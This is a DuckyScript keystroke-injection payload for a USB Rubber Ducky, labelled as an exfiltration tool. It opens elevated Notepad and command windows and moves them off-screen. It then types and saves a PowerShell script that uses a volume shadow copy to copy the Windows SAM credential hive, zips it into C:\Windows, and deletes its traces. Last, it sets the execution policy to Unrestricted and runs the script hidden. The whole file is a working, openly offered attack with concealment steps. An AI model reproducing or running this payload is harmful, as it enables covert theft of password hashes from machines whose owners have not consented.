109 lines
3.2 KiB
Plaintext
109 lines
3.2 KiB
Plaintext
REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
|
|
REM Description: Extracts Security Account Manager of the PC to a file.
|
|
REM Version: 1.0
|
|
REM Category: Exfiltration
|
|
DELAY 750
|
|
GUI r
|
|
DELAY 1000
|
|
STRING powershell Start-Process notepad -Verb runAs
|
|
ENTER
|
|
DELAY 750
|
|
ALT y
|
|
DELAY 750
|
|
ENTER
|
|
ALT SPACE
|
|
DELAY 1000
|
|
STRING m
|
|
DELAY 1000
|
|
DOWNARROW
|
|
REPEAT 100
|
|
ENTER
|
|
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
|
|
ENTER
|
|
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime
|
|
ENTER
|
|
STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory
|
|
ENTER
|
|
STRING $date = get-date
|
|
ENTER
|
|
STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"
|
|
ENTER
|
|
STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'
|
|
ENTER
|
|
STRING $Report = $Report + "<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"
|
|
ENTER
|
|
STRING $createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\', 'ClientAccessible')
|
|
ENTER
|
|
STRING $shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID }
|
|
ENTER
|
|
STRING $addSlash = $shadow.DeviceObject + '\'
|
|
ENTER
|
|
STRING cmd /c mklink C:\shadowcopy $addSlash
|
|
ENTER
|
|
STRING Copy-Item 'C:\shadowcopy\Windows\System32\config\SAM' $fileSaveDir
|
|
ENTER
|
|
STRING Remove-Item -recurse -force 'C:\shadowcopy'
|
|
ENTER
|
|
STRING $Report >> $fileSaveDir'/ComputerInfo.html'
|
|
ENTER
|
|
STRING function copy-ToZip($fileSaveDir){
|
|
ENTER
|
|
STRING $srcdir = $fileSaveDir
|
|
ENTER
|
|
STRING $zipFile = 'C:\Windows\Report.zip'
|
|
ENTER
|
|
STRING if(-not (test-path($zipFile))) {
|
|
ENTER
|
|
STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
|
|
ENTER
|
|
STRING (dir $zipFile).IsReadOnly = $false}
|
|
ENTER
|
|
STRING $shellApplication = new-object -com shell.application
|
|
ENTER
|
|
STRING $zipPackage = $shellApplication.NameSpace($zipFile)
|
|
ENTER
|
|
STRING $files = Get-ChildItem -Path $srcdir
|
|
ENTER
|
|
STRING foreach($file in $files) {
|
|
ENTER
|
|
STRING $zipPackage.CopyHere($file.FullName)
|
|
ENTER
|
|
STRING while($zipPackage.Items().Item($file.name) -eq $null){
|
|
ENTER
|
|
STRING Start-sleep -seconds 1 }}}
|
|
ENTER
|
|
STRING copy-ToZip($fileSaveDir)
|
|
ENTER
|
|
STRING remove-item $fileSaveDir -recurse
|
|
ENTER
|
|
STRING Remove-Item $MyINvocation.InvocationName
|
|
ENTER
|
|
CTRL s
|
|
DELAY 750
|
|
STRING C:\Windows\config-98437.ps1
|
|
ENTER
|
|
DELAY 1000
|
|
ALT F4
|
|
DELAY 750
|
|
GUI r
|
|
DELAY 500
|
|
STRING powershell Start-Process cmd -Verb runAs
|
|
ENTER
|
|
DELAY 1000
|
|
ALT y
|
|
DELAY 750
|
|
STRING mode con:cols=14 lines=1
|
|
ENTER
|
|
ALT SPACE
|
|
DELAY 750
|
|
STRING m
|
|
DELAY 1000
|
|
DOWNARROW
|
|
REPEAT 100
|
|
ENTER
|
|
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
|
|
ENTER
|
|
DELAY 750
|
|
STRING powershell.exe -windowstyle hidden -File C:\Windows\config-98437.ps1
|
|
ENTER
|